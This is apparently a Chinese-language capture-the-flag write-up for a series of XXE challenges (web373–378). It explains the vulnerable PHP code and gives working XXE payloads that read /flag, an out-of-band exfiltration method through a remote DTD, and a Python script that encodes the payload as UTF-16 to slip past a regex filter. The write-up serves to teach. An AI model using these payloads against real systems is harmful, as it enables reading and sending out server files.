web373 

libxml_disable_entity_loader(false)：这行代码用于启用实体加载器，允许加载外部实体。

$xmlfile = file_get_contents('php://input')：从输入流中读取XML数据并存储在 $xmlfile 变量中。

$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD)：加载XML数据到 DOMDocument 对象中，并设置选项 LIBXML_NOENT 和 LIBXML_DTDLOAD，这些选项用于控制XML解析器的行为。

$creds = simplexml_import_dom($dom)：将 DOMDocument 对象转换为 SimpleXMLElement 对象。

$ctfshow = $creds->ctfshow;：从 XML 数据中获取名为 ctfshow 的元素的值。

burpsuite抓包发送

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>
 

forword

web374-376

这题没有回显，可以使用外带数据通道提取数据

一个dtd文件在本地服务器上

在写一个get.php文件接收数据

抓包输入

 

我们需要获得当前目录下的flag数据,然后在本地服务器创建的dtd文件（创建与我们的服务器的联系）,最后一个%send将实体解析,于是在题目的服务器下,将/flag文件里的数据通过实体%file通过get传参传入了get.php文件中并执行,于是触发命令,在本地服务器建立flag.txt并将flag写入了其中

web 375

和上一题相比,这一题过滤了版本号，不写就可以，和上一题方法一样。

web 376

也是过滤了版本号，同上

web 377

这题在过滤了版本的基础上还过滤了http头

关于xml解析器：
XML解析器通常可以解析多种编码形式的XML文档，其中一些常见的编码包括：

UTF-8：这是最常见的编码形式，也是许多XML文档默认使用的编码。
UTF-16：XML文档也可以使用UTF-16编码。
ISO-8859-1（Latin-1）：虽然不常见，但XML解析器通常也能够解析使用ISO-8859-1编码的XML文档。
其他：除了上述常见的编码形式之外，XML解析器还可能支持其他一些编码形式，如UTF-32等。
通常情况下，XML解析器能够根据XML文档中的声明或者特征来确定文档所使用的编码形式，从而正确解析文档内容。

正则表达式通常是针对ASCII字符编写的，而不是针对Unicode字符编写的。
UTF-16编码使得每个字符占用两个字节，这可能会使得某些正则表达式检测不到字符串中的特定模式，因为正则表达式可能只检查单个字节或特定的字节序列。

因此可以更改编码方式过后,我们就可以绕过简单的正则表达式

构造post传参：

import requests
 
url = 'http://8b8a3d03-40d2-4131-a046-710f0cd40dbd.challenge.ctf.show/'
data = """<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/test.dtd">
%dtd;
%send;
] >"""
 
requests.post(url ,data=data.encode('utf-16'))
print("done!")
 

web 378

随便输入看到有回显

抓包

111改成&xxe; 、前面加上：

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>

[POST]Payload:

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>$xxe;</password></user>